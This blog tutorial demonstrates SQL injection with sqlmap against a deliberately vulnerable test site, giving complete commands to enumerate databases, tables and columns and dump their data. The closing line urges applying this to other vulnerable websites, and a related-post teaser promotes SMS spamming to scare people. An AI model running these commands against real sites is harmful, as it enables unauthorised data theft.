SQL injection using of SQLMAP Ankit Chaubey, 19, June 202219, June 2022 TABLE OF CONTENTS1 What is sql injection ?2 What is SQLMAP ?3 Where can you use SQLMAP?3.0.1 Installing sqlmap command3.0.2 Open this link in your browser3.1 1. List information of existing database3.2 2. List information about Tables present in a particular Database 3.3 3. List information about the columns of a particular table 3.4 4. Dump the data from the columns3.4.1 Conclusion3.4.2 Sqlmap Cheat Sheet4 About The Author4.1 Ankit Chaubey5 RelatedWhat is sql injection ?SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.What is SQLMAP ?SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.Where can you use SQLMAP?When you notice a web url that is of the structure http://testphp.vulnweb.com/listproducts.php?cat=1, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based.Sql vulnerableA simple way to check whether your website is vulnerable or not, replace the value in the get request parameter with an asterisk (*), if you got sql error, then we can conclusively say that the website is vulnerable.Sql vulnerableInstalling sqlmap commandsudo apt-get install sqlmap In this tutorial, we will use vulnerable website that is designed for testing purpose.Open this link in your browserhttp://testphp.vulnweb.com/listproducts.php?cat=11. List information of existing database Open your terminal and typesqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbsWhere, -u for url and –dbs for database list.Output showing us that there are two available databases, acuart and information_schema. In some case, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type âYâ.2. List information about Tables present in a particular Database sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables Where, -u for url , -D for databse, –tables for tables present in database.We see that 8 tables have been retrieved. So now we can say that the website is definitely vulnerable.3. List information about the columns of a particular table sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columnsWhere, -u for url , -D for databse, -T for table, –columns for column present in table3 columns found in ‘artists’ table in ‘acuart’ database4. Dump the data from the columnssqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dumpWhere, -C for column name and –dump for dump data from the column You can see that we have accessed the data from the database.ConclusionApply this method in such vulnerable websites, You can literally explore through the databases to extract information.Sqlmap Cheat Sheet About The Author Ankit Chaubey See author's postsRelated Exploits Hacking kali Linux sql injectionsqlmap
Hacking What is Maltego and How to use it? 1, July 20221, July 2022TABLE OF CONTENTS1 What is Maltego?1.1 Why Maltego is so popular?1.2 Using Maltego in Kali linux1.2.1 Maltego Video Tutorial2 About The Author2.1 Ankit ChaubeyWhat is Maltego? Maltego is an open-source intelligence forensic application that helps you to gather more accurate information in a smarter way. In simple words, it is… Read More
kali Linux Kali Linux Explained: Everything You Need to Know 1, June 202221, September 2023Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. It is a multi platform solution,… Read More
How To How to send Infinite SMS Messages 15, September 202315, September 2023Sometimes, hackers take pleasure in scaring or making fun of people by saying that their account has been compromised. They do this by sending people an endless stream of spam SMS messages, making it appear that their account has been compromised. These spammers either want to scare people or secretly… Read More